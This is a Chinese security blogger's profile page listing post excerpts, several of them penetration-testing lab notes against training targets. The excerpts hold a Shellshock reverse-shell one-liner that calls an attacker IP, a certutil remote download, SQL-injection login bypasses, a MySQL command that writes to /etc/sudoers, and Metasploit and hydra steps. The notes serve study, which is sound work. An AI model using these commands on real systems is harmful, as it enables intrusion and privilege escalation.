自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

网络安全领域优质创作者

分享工作中遇到的问题及解决方案,偶尔谈人生梦想。

  • 博客(182)
  • 资源 (10)
  • 收藏
  • 关注

原创 毕业4年,薪资翻了十多倍,我总结了逆袭的方法

熟能生巧,巧能开花,花能结果前言从毕业之后跟身边的朋友讨论过最多的就是关于职业发展的话题,我一直想写这样的一篇文章分享如何才能规划好自己的职业生涯,漂亮的打一场翻身仗。我特别喜欢卷王这个名称,虽然我目前没有太大的成就,超越95%的同龄人应该问题不是特别大吧,所以我准备简单的聊一下关于毕业后如何做好职业规划。写这个文章的的时候我构思了很多种写法,因为考虑到读者大部分是在读大学生以及部分毕业不久的小伙伴,我主要讲讲毕业后的规划吧。大学在大学期间,本身我自己其实是没咋学专业知识的,时间大部分可能花.

2021-11-17 18:13:45 97

原创 九、ISO 27000 术语定义及相关资料

编者说明:此处使用的 27000 术语定义来自国标转化的 27000 标准 ISO 27000:2016(GB/T 29246— 2017/ ISO/IEC 27000: 2016 信息技术 安全技术 信息安全管理体系 概述和词汇)。其中编号按原文编号排列。ISO 27000:2016 对术语定义有下列说明:ISMS 标准族的术语归属者是指最初定义该术语的标准。术语归属者还要负责对定义进行维护,即提供、评审、更新和删除。ISO/IEC27000 本身不定义任何术语。ISO/IEC27001 和 I

2021-11-09 10:31:55 52

原创 八、CISP 教材缩略语(2019 版)

缩写 英文 中文A ASME American Society of Mechanical Engineers 美国机械工程师协会AES Advanced Encryption Standard 高级加密标准AS Authentication Server 认证服务AAA Authentication、Authorization、Accounting 认证、授权和计费AC Attribute Certificate 属性证书ADF Access Control Decision Functi

2021-11-09 10:27:45 436

原创 七、CISSP 认证考试指南(AIO)第 7 版术语表

9.1 A9.1.1 access 访问主体查看、更改客体或与客体通信的能力。访问支持信息在主体和客体之间的流动。9.1.2 access control 访问控制限制只有被授权主体才能访问资源的机制、控制和方法。9.1.3 access control list (AGL) 访问控制列表,ACL被授权访问特定客体的主体列表。通常,通过 ACL 可以读、写、执行、添加、更改、删除和创建访问的类型。9.1.4 access control mechanism 访问控制机制管理、物理或技术性控制

2021-11-09 10:15:26 148

原创 六、CISSP 官方学习指南(OSG)第 7 版术语对照表

8.1 数字和符号8.1.1 *(星)完整性公理: (*公理)Biba 模型的公理,规定在特定分类级别上的主体不能向较高分类级别写入数据。这通常会被缩略为"不能向上写"。8.1.2 *(星)安全属性: (*属性)Bel1-LaPadula 模型的属性,规定在特定分类级别上的主体不能向较低分类级别写入数据。这通常会被缩略为"不能向下写"。8.1.3 802.11i(WPA-2)对 802.11 标准的修正,定义了新的身份认证以及类似于 IPSec 的加密技术。迄今为止, 还不存在能够危害已正确配置

2021-11-09 10:12:13 434

原创 五、信息安全术语中英文词条对照表

序号 中文词条 英文词条(N)中继 (N)-relay抽象语法 abstract syntax访问/存取 access访问控制 access control访问(存取)控制证书 access control certificate访问控制判决功能 Access control Decision Function(ADF)访问控制判决信息 Access control Decision Information(ADI)访问控制实施功能 Access contro

2021-11-09 10:09:05 37

原创 四、资讯安全网词汇表

6.1 A6.1.1 接达控制系统 (Access Control System)保证电脑资源只供获授权人士使用。6.1.2 地址仿冒 (Address Spoofing)地址欺骗即假冒他人地址,例如互联网规约地址仿冒。6.1.3 行政性保安 (Administrative Security)运用管理程序和机制以防止未获授权接达系统。6.1.4 广告软件 (Adware)当广告软件运行时会显示广告标语。很多广告软件同时也是间谍软件。6.1.5 高级加密标准运算法 (Advanced Enc

2021-11-09 10:00:44 666

原创 三、Oracle 网络安全词汇表

来自:《在 Oracle® Solaris 11.2 中确保网络安全》5.1 3DES请参见 Triple-DES(三重 DES)。5.2 AESAdvanced Encryption Standard(高级加密标准)。一种对称的块数据加密技术。美国政府在 2000 年 10 月采用该种算法的 Rijndael 变体作为其加密标准。AES 从而取代了 DES 成为政府的加密标准。5.3 asymmetric key cryptography(非对称密钥密码学)一种加密系统,消息的发送者和接收者

2021-11-09 09:58:21 3833

原创 二、中英文最全的网络安全术语表-学网络安全必备

4 中英文最全的网络安全术语表按字母 A-Z 顺序排列,用简单的中英文解释,让你了解到最全的网络安全术语。4.1 A4.1.1 高级持久威胁(APT)一种网络攻击,使用复杂的技术持续对目标政府和公司进行网络间谍活动或其他恶意活动。通常由具有丰富专业知识和大量资源的对手进行-通常与民族国家参与者相关。这些攻击往往来自多个入口点,并且可能使用多个攻击媒介(例如,网络攻击,物理攻击,欺骗攻击)。一旦系统遭到破坏,结束攻击可能非常困难。4.1.2 警报(Alert)关于已检测到或正在进行信息系统网络安

2021-11-08 17:34:49 2379

原创 一、网络安全专有名词汇编详解(黑话指南)-史上最全

1 编者前言本文档是基于网络公开资料整理而成,属于个人笔记性质。需要什么词语直接Ctrl+f然后搜索即可。主要内容是汇编了一些网络安全的词汇表、术语表,可用于日常网络安全知识学习,或工作/考试中的速查。有些涉及中英文对照的地方,可能原译者描述的比较费解,建议参考英文原文,或对照其它资料理解。网络安全术语更新很快,一些最新的词汇或术语可能在本文档中查询不到,建议上网查询或咨询专家。因为文字扫描识别或编辑整理的问题,文档中可能存在一些文字上的错误,欢迎网友指出,希望将来有机会更新修订;另外,也欢迎网友

2021-11-08 17:29:21 74

原创 租住南山的互联网大厂人:年入70万,睡城中村单间

今年7月份,刘禹坐在房东的小电驴后座,顶着烈日来到位于南山高新中四路的凯丽花园。这是个建于上个世纪90年代的老住宅区,斑驳的楼体、生锈的窗栏印证着它的年龄。不过,它距离腾讯大厦仅有数百米,在夏天这个租房高峰季,可谓一房难求。刘禹要看的房子,是一间逼仄的隔断间,不到20平方米,床头紧挨着洗脸池,同一套住宅里还住着另外四个房客,唯一不错的就是隔断间里有独立卫生间。房东带刘禹看房时,房间里还站着中介带来的两个腾讯员工。刘禹看过之后,不敢迟疑,下楼后立马提出跟房东签合同。这时,中介...

2021-11-08 15:06:36 195

原创 花了1000个小时才考过的安全证书,这是总结出来的精髓笔记。

10.11.1.139 root 搜索思路windows下:certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat windows下载文件for /r Users %i in (*.ps1) do @echo %i 查找文件for /r c:/ %i in (*.txt) do @echo %ifindstr /s /i /n "aad3b435b51404eeaad3b435b51404ee" *.* ...

2021-11-06 10:18:45 40

原创 渗透测试防御-sql万能密码、mysql提权

http://10.11.1.252:8000登陆后台用123' or 1=1 #或者123' or '1'='1绕过登陆 获取用户名密码j0hnbzuisJDnuI6WUDlsshj0hn@10.11.1.252 -p 22000跑一下提权脚本,linEnum.sh,发现mysql以root权限在运行。lordoftherootselectdo_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc...

2021-11-05 11:49:53 29

原创 网络防御与对抗-wp漏洞利用

wpscan-u http://10.11.1.251/wp/ --enumeratevpvt是扫描主题漏洞扫描插件漏洞wp-forum - SQL Injection参考连接:Wordpress wp-forum plugin SQL Injection - CXSecurity.comhttp://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_c...

2021-11-05 11:48:08 202

原创 网络攻防-wp cms利用

http://10.11.1.234/wp-login.php?redirect_to=http%3A%2F%2F10.11.1.234%2Fwp-admin%2Fusers.php&reauth=1wpscan可以爆破密码admin princess修改Appearance 404.php为以下shellhttps://www.jb51.net/article/17844.htm访问任意不存在页面即可反弹,http://10.11.1.234/?p=9991...

2021-11-05 11:46:29 161

原创 网络防御与学习-tomcat 默认密码利用

10.11.1.209Nikto扫描得到:Defaultaccount found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.访问8080端口,找到后台登录地址,尝试tomcat tomcat顺利登录后台。Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Mu...

2021-11-05 11:43:36 12

原创 渗透测试三合一-仅供参考

10.11.1.141搜索webmin,确定使用2017.plperl2017.pl 10.11.1.141 10000 /root/proof.txtloading1 (alice)BUGZBUNNY (bob)10.11.1.145完成nmap-p 445 --script vuln 10.11.1.145CVE-2009-3103msf搜索用:exploit/windows/smb/ms09_050_sm...

2021-11-05 11:38:23 412

原创 渗透测试学习-Remote File Inclusion shell

http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-21213/111111111/slogin_lib.inc.php?slogin_path=http://10.11.0.86/Let's kick shell-ish, Part 2: Remote File Inclusion shell – Techorganic – Musings from the brainpancat /etc/fstab搜索 reiserfs explo.

2021-11-05 11:34:08 314

原创 网络渗透测试安全攻防-Cuppa CMS 文件包含漏洞

目录扫描,拿到登陆地址http://10.11.1.116/db/phpliteadmin.php adminphpliteadmin1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps ExploitCuppaCMS文件包含漏洞http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../.....

2021-11-05 11:30:48 38

原创 网络攻防渗透测试-ms11-046 提权

http://10.11.1.73:8014/LICENSE/http://10.11.1.73:8014/content/http://10.11.1.73:8080/php/http://10.11.1.73:8080/PHP/install/install.txt找到账号密码groups Options勾选Personal disk spaceSitesOvidentiaFile upload configuration C:\wamp\www\PHP\...

2021-11-05 11:29:24 18

原创 实战渗透测试-james 2.3.2漏洞利用

james2.3.2版本默认账号密码rootnc10.11.1.72 4555set password johnnewpasstelnet 10.11.1.72 110USER johnPASSnewpaslist获得账号密码:ryuuQUHqhUPRKXMo4m7kchsh可以更改用户登陆的shellApache James Server 2.3.2 - Remote Command Execution - Linux remote...

2021-11-05 11:28:09 617

原创 渗透测试网络攻防-apache cgi漏洞利用

cgi-bin扫描路径暴露出:/cgi-bin/wget-qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0);...

2021-11-05 11:26:44 186

原创 渗透实战-HttpFileServer漏洞利用

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.49-oX10.11.1.49.xmlxsltproc-o10.11.1.49.html10.11.1.49.xml9505端口运行HttpFileServer服务,搜索HFS得到39161.py修改里面的端口和放置nc.exe得到shell$secpasswd=ConvertTo-SecureString"aliceishere" -As...

2021-11-05 11:25:10 31

原创 渗透测试实战-OTRS 5.0.x/6.0.x漏洞利用

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.39-oX10.11.1.39.xmlxsltproc-o10.11.1.39.html10.11.1.39.xmlnikto-h 10.11.1.39扫描到/otrs/index.pl 确认版本为5.0.2默认用户(root@localhost),密码是OTRs搜索漏洞OTRS 5.0.x/6.0.x - Remote Command E...

2021-11-05 11:21:30 16

原创 实战渗透测试-hydra 爆破 CVE-2010-3847 提权

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.35 -oX10.11.1.35.xmlxsltproc-o10.11.1.35.html10.11.1.35.xmlhydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.11.1.35ssh密码爆破https://10.11.1.35/section.php?pa...

2021-11-05 11:19:50 7

原创 靶机实战网络攻击---MS17-010利用

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.31 -oX10.11.1.31.xmlxsltproc-o10.11.1.31.html10.11.1.31.xmlsqlmap-u "http://10.11.1.31/login-off.asp" --data="txtLoginID=amdin&txtPassword=1&cmdSubmit=Login" --dbs--curre...

2021-11-05 11:17:14 174

原创 网络实战攻击-编辑器漏洞利用

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.24 -oX10.11.1.24.xmlxsltproc-o10.11.1.24.html10.11.1.24.xml爆破目录发现后台登陆界面:http://10.11.1.24/admin.php弱密码:admin admin编辑器上传文件:http://10.11.1.24/admin.php?target=template_editor通...

2021-11-05 11:12:44 9

原创 网络实战攻击-Samba 远程缓冲区溢出漏洞

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.22 -oX10.11.1.22.xml搜索远程缓冲区漏洞searchsploitSamba Remote Buffer Overflow选用 cd/usr/share/exploitdb/exploits/linux/remote/7.plperl7.pl -t linx86 -H 10.11.0.243 -h 10.11.1.22进入...

2021-11-05 11:08:47 22

原创 网络渗透测试-使用put方法

以下均为实际攻击过程,记录笔记,仅供学习参考nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.13 -oX10.11.1.13.xml扫描nc10.11.1.13 80OPTIONS /script/ HTTP/1.1Host:10.11.1.13检测开启了put方法nikto-hhttp://192.168.179.142/dav/检测put方法s检测是否开启put方法...

2021-11-05 11:05:42 32

原创 实战攻击之CVE-2010-2861 网络攻击实战

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.10 -oX10.11.1.10.xmlxsltproc扫描之后得到CVE:CVE-2010-2861Google搜索后得到Adobe ColdFusion - Directory Traversal - Multiple remote Exploithttps://github.com/ctfs/write-ups-2014/tree/master/d...

2021-11-05 11:02:00 10

原创 实战攻击-php反弹shell

以下均为实际攻击过程,记录笔记,仅供学习参考whatweb10.11.1.8:80cms识别dirbhttp://10.11.1.8/ 目录扫描dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描Python3 dirsearch.py -uurl-e php扫描目录得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...

2021-11-05 11:00:12 37

原创 实战攻击-永恒之蓝

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.7-oX 10.11.1.7.xml格式转换:xsltproc-o118.190.244.96.html118.190.244.96.xmlms08-067方案一:msfconsolesearch ms08-067use exploit/windows/smb/ms08_067_netapishow payloadsset ...

2021-11-05 10:57:13 336

原创 powershell 执行权限问题

windows得新版本系统是不能直接执行ps1脚本的,所以在执行脚本前,需要先更改相关权限。直接执行以下代码就成。先打开powershell,然后复制粘贴执行完事。Set-ExecutionPolicy Unrestricted -ForceSet-ExecutionPolicy "RemoteSigned" -Scope Process -Confirm:$false -ForceSet-ExecutionPolicy "RemoteSigned" -Scope Current.

2021-11-04 14:39:29 18 3

原创 ubuntu 配置 syslog 服务器

sudo vi /etc/rsyslog.conf根据需求放开以下TCP或者UDP 相关配置:# provides UDP syslog receptionmodule(load="imudp")input(type="imudp" port="514")# provides TCP syslog receptionmodule(load="imtcp")input(type="imtcp" port="514")在 “GLOBAL DIRECTIVES” 段前添加$temp.

2021-08-03 16:21:50 251 6

原创 python定时器的用法

很多场景下存在需要定时操作的功能,比如定时进行写入操作或者获取数据。我主要是用来定时获取配置的,然后达到更新配置的目的。代码参考如下:import threadingimport randomimport timetimes = random.randint(1, 10)print(times)class ddd: def fun_timer(self): print('Hello Timer!') times = random.rand

2021-07-09 15:46:42 37

原创 make: command not found 解决办法

出现错误:-bash: make: command not found原因分析:一般出现这个-bash: make: command not found提示,是因为安装系统的时候使用的是最小化mini安装,系统没有安装make、vim等常用命令,直接sudo apt-get install安装下即可。解决方法:sudo apt-get updatesudo apt-get install gcc automake autoconf libtool make直接ssh运行即可,安装make.

2021-06-30 15:31:54 262

原创 ubuntu安装redis

Redis在Linux Ubuntu中安装本文使用的Linux是Ubuntu的系统,安装Redis数据库软件包可以通过apt-get实现。在Linux Ubuntu中安装Redis数据库#安装Redis服务器端~ sudo apt-get install redis-server安装完成后,Redis服务器会自动启动,我们检查Redis服务器程序# 检查Redis服务器系统进程~ ps -aux|grep redisredis 4162 0.1 0.0 10

2021-06-29 09:29:29 80

原创 linux性能监控工具Netdata安装和卸载教程

Netdata介绍Netdata是一款Linux系统性能实时监控工具。是一个高度优化的Linux守护进程,可以对Linux系统、应用程序(包括但不限于Web服务器,数据库等)、SNMP服务等提供实时的性能监控。Netdata用可视化的手段,将其被监控的信息展现出来,以便你清楚的了解到你的系统、程序、应用的实时运行状态,而且还可以与Prometheus,Graphite,OpenTSDB,Kafka,Grafana等相集成。Netdata是免费的开源软件,目前可在Linux,FreeBSD和mac

2021-05-28 10:54:18 249 1

原创 以入侵检测的视角进行应急响应

​日常记录,仅供收藏,用时不慌。0x01 写在开头基于主机层的应急响应和入侵检测感觉有点相似,具体有什么异同呢?一、应急响应和入侵检测都需要获取什么信息,目的各自是什么?1、快照信息:获取服务器的当前运行情况的信息,基础信息,日志信息,便于安全监控和后期取证或溯源分析;2、异常检查:初筛作用,初步做些排查和异常检查,若发现异常,人工进行分析;3、入侵检测:后门特征检查,包括历史曾经发现过的后门检查;二. 入侵检测和Linux应急检查为对应关系,二者关...

2021-04-21 10:31:17 118

原创 ubuntu安装、升级、卸载golang

ubuntu安装、升级、卸载golang一、安装go下载go 方法一:官网下载:https://golang.org/dl/ 方法二:打开ubuntu输入: wget https://dl.google.com/go/go1.16.3.linux-amd64.tar.gz解压安装包:sudo tar -C /usr/local -xzf go1.16.3.linux-amd64.tar.gz建立软连接:sudo ln -sf /usr/local/go/bin/* /.

2021-04-16 11:57:13 215

2021.06零信任落地案例集.pdf

云安全联盟大中华区-版权所有 仅供参考学习

2021-11-05

用户帐号和密码安全管理规范.doc

本管理制度适用于**所有用户帐号和密码,以及能访问相关计算机信息的员工,包括管理、支持、维护用户帐号和密码的IT人员。

2021-11-05

企业安全规划.pptx

企业安全规划.pptx

2021-11-05

网络安全词汇术语汇编-v3.0.1.pdf

本文档是 基于 网 络 公 开 资料 整理 而成, 属于 个 人 笔记性质。非本博主原创。 主要内容是 汇编 了 一些网络安全的词汇表 、 术语表 可 用于 日常网络 安全 知识 学习, 或工作 考试 中 的 速 查 。 有些 涉及 中英文对照的 地 方 可能 原 译者描 述的 比较 费 解 ,建议 参考英文原文 ,或 对照其它资料 理解 。 网络安全术语更新很快,一些最新的词汇或术语 可能 在本文档中查 询 不到,建议上网查 询 或 咨询专家。 因为文字扫描识别或编辑整理 的 问题, 文档 中 可能存在一些文字 上 的 错误 ,欢迎网友指出 ,希望 将来有 机会 更新 修订 ;另 外,也欢迎网友推荐或分 享 相关 网络 安全词汇 资料,希望将来有 机会 补充。 谢谢联系编者可以 索取 本 文档的 最 新 word 版 修订 版 联系 方式 微 信: Rick_Kang_CN

2021-11-05

内网针对AD域的攻击方式和防护方法 - 聂君-外发.pdf

来自于聂君大佬,仅供学习

2021-11-05

20201126-Insec-红蓝对抗中的溯源反制实战-深交所-郭威.pdf

作者-深交所-郭威

2021-11-05

OWASP区块链安全TOP 10 2019.pdf

OWASP区块链安全TOP 10 2019.pdf

2021-11-05

华为安全产品默认用户名密码速查表.xlsx

华为安全产品默认用户名密码速查表.xlsx

2021-11-05

行动中的攻防对抗体系研究.pdf

行动中的攻防对抗体系研究.pdf

2021-11-05

Linux_基础教程--Shell脚本编程.ppt

本文档为原创,主要讲解了基于linux平台的bash编程基本命令使用,帮助学习者熟悉Shell 脚本的编码规范,掌握执行和调试方法,掌握对变量进行整数运算和间接引用的方法,理解位置参数变量和特殊参数变量的用途,掌握条件测试的使用 [] 、[[]]、(()),掌握各种流程控制语句的使用,掌握函数的定义、调用和传递返回值的方法等

2018-06-07

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除